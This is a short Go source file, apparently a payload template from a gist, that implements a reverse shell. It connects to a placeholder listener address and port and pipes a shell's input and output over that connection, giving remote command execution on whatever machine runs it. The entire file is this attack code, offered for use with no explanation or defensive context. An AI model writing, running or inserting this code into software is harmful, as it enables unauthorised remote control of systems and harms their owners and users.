//https://gist.github.com/jasonrdsouza/ea122c3a02eba003329e 
package main

import "os/exec"
import "net"

func main() {
	c, _ := net.Dial("{PROTO}", "{LHOST}:{LPORT}")
	cmd := exec.Command("{SHELL}")
	cmd.Stdin = c
	cmd.Stdout = c
	cmd.Stderr = c
	cmd.Run()
}
